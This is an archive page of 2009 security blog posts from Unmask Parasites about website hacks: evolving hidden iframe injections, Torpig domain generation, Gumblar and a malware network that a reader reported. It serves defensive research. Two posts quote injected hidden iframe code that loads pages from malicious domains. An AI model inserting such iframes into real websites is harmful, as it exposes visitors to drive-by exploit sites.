Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
Loading site search ...

From Hidden Iframes to Obfuscated Scripts

23 Dec 09   Filed in Website exploits with 52 Comments

In December, I noticed that ubiquitous hidden iframes that have been the prevailing site hack this year seemed to have gone. Unmask Parasites finds them on very few sites now. And even on infected sites, I see only old domains, while this attack is known for introducing at least one new domain every day and for frequently updating the iframe code on infected sites.

At the same time I noticed a new type of obfuscated scripts injected into hacked websites. And I believe it’s a new incarnation of the same attack that previously injected hidden iframes.
Here’s the story »»

Intermediaries to Torpig Attack Sites

15 Dec 09   Filed in Website exploits with 1 Comment

In the previous post, I reviewed a website hack that injected malicious scripts that used Twitter API to generated domain names for attack sites. Domain names of the attack sites changed two times a day.

However since the malicious script works on the client side, the algorithm of the domain name generator can be easily extracted and used to predict upcoming malicious domains. To demonstrate this, I created my online “Torpig Domain Generator” that displays the currently used attack site and two domains of upcoming attack sites. It’s been working for mre than a week now and so far it is very accurate (For unknown reason hackers didn’t activate malicious domains this past Saturday, but infected sites still redirected to the same domains predicted by my generator.)

The fact that the algorithm is open and domain names of the upcoming malicious sites are known even before hackers register them means that any one who wants to stop the attack can pre-register those domains (so far it looks like no one have spare $20/day for this). The same algorithm can be used to proactively blacklist malicious domain names.

I’m sure hackers are aware of these downsides of open algorithms. Now they are trying to take advantage of the frequently changing pseudorandom domain names hiding the algorithm of the domain name generator behind intermediary servers-redirectors.
Here’s the story »»

Tweet Week: Nov 2-8, 2009

08 Nov 09   Filed in Tweet Week with Comments Off on Tweet Week: Nov 2-8, 2009

Selected short messages and links you might have missed if you don’t follow me on Twitter.

Nov 2, 2009

Mal/Iframe-N: Another winning infection? – Sophos on malicious iframes (with references to my blog posts)

Nov 3, 2009

[] How to search for ‘backdoors’ in a hacked WordPress site

Nov 5, 2009

Story about Gumblar breaking WordPress on The New York Times site  – based on my latest blogpost. Thanks @bobmcmillan

[] new security patches for Java and Shockwave Player

Nov 6, 2009

SCMagazine mentions my blog in their article “Gumblar site infections return, WordPress among affected

Found an AdSense ad that offers to download pirated version of Avast Pro (probably infected). Reported it to Google. (lifeplain .com is a scam)

If you want more real-time experience, you can follow @unmaskparasites on Twitter.

Similar posts:

Tweet Week: Oct 26 – Nov 1, 2009

01 Nov 09   Filed in Tweet Week with Comments Off on Tweet Week: Oct 26 – Nov 1, 2009

Selected short messages and links you might have missed if you don’t follow me on Twitter.

Oct 26, 2009

[link:Sophos blog] New type of hidden malicious iframes

Oct 28, 2009

[milestone] 50 blog posts on (in less than a year)

Security updates are available for Firefox 3/3.5 and Opera 10. Make sure to update your browser ASAP

Oct 30, 2009

I published a “beta” of my Practical Guide to Dealing With Google’s Malware Warnings – need your feedback. Thanks

[] How to find a backdoor in a hacked WordPress – great article

Oliver Fisher (Google Anti-Malware) on Google’s automates malware scanners and warnings

If you want more real-time experience, you can follow @unmaskparasites on Twitter.

Similar posts:

Buggy Malware: Iframes Eat Web Pages

29 Oct 09   Filed in Website exploits with 7 Comments

Yesterday, when I wrote about hidden iframes I forgot to mention one interesting side effect of the new iframes with “onload” scripts – they eat web pages.

Actually, those iframes don’t eat web pages themselves – it is done by buggy software that hackers use to inject hidden iframes into legitimate web pages.
Here’s the story »»

Evolution of Hidden Iframes

28 Oct 09   Filed in Website exploits with 12 Comments

Injecting hidden malicious iframes into compromised legitimate websites is one of the most popular types of malware attacks. Invisible iframes allow to silently load exploits from “bad” sites while unsuspecting web surfers browsing visible content of infected websites.

Iframes are rectangular elements of webpages where you can load other web pages either from the same site or from some third party site (in other words: webpage inside a webpage). There are many legitimate uses of iframes. The most common is ad blocks (e.g. Google displays AdSense in iframes)

Hiding iframes

It is said that iframes are rectangular elements and they occupy some space on web pages. So how do hackers make them invisible?
Continue »»

Quicksilver Malware Network

17 Sep 09   Filed in Website exploits with 6 Comments

In my latest post about the iframe attack that used free domains from dynamic DNS hosting providers that pointed to a network of compromised dedicated server, I asked readers for any additional information they know about this attack. A few day later I received this email:

Hi there.

Since this may I am watching this network (I named it “quicksilver“) after two PCs/users ran into cn-8080-iframe-modified websites. Using only “white hat” instruments (dig, whois, malzilla, VMWare, google and my brain ;) ) I was able to collect information about the basic frame of this network.

It is not a simple botnet – it combines three networks with different functions to form a “malware superstructure”.

Nearly everything in this network is constantly moving (thus the name) and uses compromised machines acting as proxies or slaves. The machines of the real black hats are movable themselves – the older “gumblar” network (which i think is a precursor to quicksilver) used an ukrainian c&c-server with a different ip address.

At the end of the email, the reader said that he had a chart of this network and asked me if I wanted to take a look at it. The information looked interesting so I asked if he would like to publish it on my blog and got his permission:

you have my explicit permission to publish everything I send you – anonymously. Although I have a name and a title, the only thing relevant is to unmask those networks.

So here it is. I’ve published the story as is. I just added some formatting and converted the chart to GIF format to avoid PDF security concerns.
Continue »»

Dynamic DNS and Botnet of Zombie Web Servers

11 Sep 09   Filed in Website exploits with 44 Comments

It’s always interesting to watch how malware attacks evolve over time.

Since this spring, when I started to distinguish it from other attacks, this hidden iframe injection attack has always been among “leaders”.

  • They started with gambling-related .cn domains (like cheapslotplay .cn).
  • They introduced several new domains names every day so that you couldn’t hardcode them in your scanners. At this point, my records contain several hundred domains used in this attack.
  • They also changed campaign names (parameters they specify in iframe URLs) regularly: mozila, banner, cocacola, pepsi, open, reopen, income.
  • They used port 8080 (presumably to game dumb traffic filters that only inspect traffic on port 80).
  • In the end of July, they started to use 3-letter .ru, .pl, .in and .at domains (e.g. x3y .ru, f7y .at, q5n .in, a3j .pl).
  • And, finally, if you follow me on Twitter, you know that this week I started to notice 3rd-level domains registered with free dynamic DNS services.

Here are the details »»

Hidden CN Iframes Are Still Prevalent

25 Jun 09   Filed in Website exploits with 33 Comments

This post is a reminder that .cn iframe attacks are still among leaders.

The URLs of malicious iframes change over the time. Hackers introduce new suffixes (campaigns?) like : mozila, banner, cocacola, pepsi, add more and more domain names.

Port 8080

Since the pepsi campaign they started using port 8080 in the URLs.

The currently form of the malicious code looks like this

< iframe src="http:// namegamestore .cn:8080/index.php" width=118 height=195 style="visibility: hidden"></iframe>

It is usually injected at the bottom of index (home) pages.
Continue »»

Another Type of IFrame Hack (PHP Exploit)

29 Apr 09   Filed in Website exploits with 36 Comments

This is a quick post about yet another type of hidden iframes injected into legitimate web pages.

The HTML code may look like this:

<iframe src="http:// xtrarobotz .com/?click=BC0230" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Domain names may vary, and the number of different iframes injected into a single web page may be different. The distinguishing feature of this exploit is the “?click=<hex_number>” part of the URL, where <hex_number> is some hexadecimal number.
Continue »»